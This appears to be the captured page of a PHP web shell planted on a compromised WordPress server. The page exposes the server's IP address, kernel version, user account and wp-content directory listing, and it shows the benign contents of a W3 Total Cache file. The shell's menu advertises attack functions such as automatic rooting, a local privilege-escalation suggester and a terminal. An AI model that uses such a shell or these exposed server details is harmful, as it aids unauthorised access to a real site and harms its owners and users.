Linux v69820.1blu.de 4.15.0 #1 SMP Mon Sep 30 15:36:27 MSK 2024 x86_64
Apache/2.4.58
Server IP : 195.90.215.149 & Your IP : 216.73.217.80
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
maskenattest /
wp-content21 /
Delete
Unzip
Name
Size
Permission
Date
Action
aiowps_backups
[ DIR ]
drwxr-xr-x
2026-08-29 22:24
cache
[ DIR ]
drwxr-xr-x
2026-09-03 07:49
languages
[ DIR ]
drwxr-xr-x
2026-09-04 06:17
mu-plugins
[ DIR ]
drwxr-xr-x
2026-09-04 03:55
plugins
[ DIR ]
drwxr-xr-x
2026-07-29 14:03
themes
[ DIR ]
drwxr-xr-x
2026-05-19 05:12
upgrade
[ DIR ]
drwxr-xr-x
2026-09-04 06:38
upgrade-temp-backup
[ DIR ]
drwxr-xr-x
2026-08-29 22:24
uploads
[ DIR ]
drwxr-xr-x
2026-09-04 04:08
w3tc-config
[ DIR ]
drwxr-xr-x
2026-09-04 10:37
advanced-cache.php
1.26
KB
-rw-r--r--
2026-02-08 03:28
index.php
28
B
-rw-r--r--
2012-01-08 17:01
object-cache.php
949
B
-rw-r--r--
2026-02-08 03:28
wplog.php
7.73
KB
-rw-r--r--
2026-07-21 10:18
Save
Rename
<?php /** * File: advanced-cache.php * * W3 Total Cache advanced cache module. * * @package W3TC */ defined( 'ABSPATH' ) || die(); global $w3tc_start_microtime; $w3tc_start_microtime = microtime( true ); /** * Abort W3TC loading if WordPress is upgrading. */ if ( defined( 'WP_INSTALLING' ) && WP_INSTALLING ) { return; } if ( ! defined( 'W3TC_IN_MINIFY' ) ) { if ( ! defined( 'W3TC_DIR' ) ) { define( 'W3TC_DIR', ( defined( 'WP_PLUGIN_DIR' ) ? WP_PLUGIN_DIR : WP_CONTENT_DIR . '/plugins' ) . '/w3-total-cache' ); } if ( ! @is_dir( W3TC_DIR ) || ! file_exists( W3TC_DIR . '/w3-total-cache-api.php' ) ) { if ( defined( 'WP_ADMIN' ) ) { // Only display errors in wp-admin. printf( '<strong>W3 Total Cache Error:</strong> some files appear to be missing or out of place. Please re-install plugin or remove <strong>%s</strong>. <br />', __FILE__ ); } } else { require_once W3TC_DIR . '/w3-total-cache-api.php'; if ( class_exists( '\W3TC\Dispatcher' ) ) { $w3tc_redirect = \W3TC\Dispatcher::component( 'Mobile_Redirect' ); $w3tc_redirect->process(); $w3tc_config = \W3TC\Dispatcher::config(); if ( $w3tc_config->get_boolean( 'pgcache.enabled' ) ) { $o = \W3TC\Dispatcher::component( 'PgCache_ContentGrabber' ); $o->process(); } } } }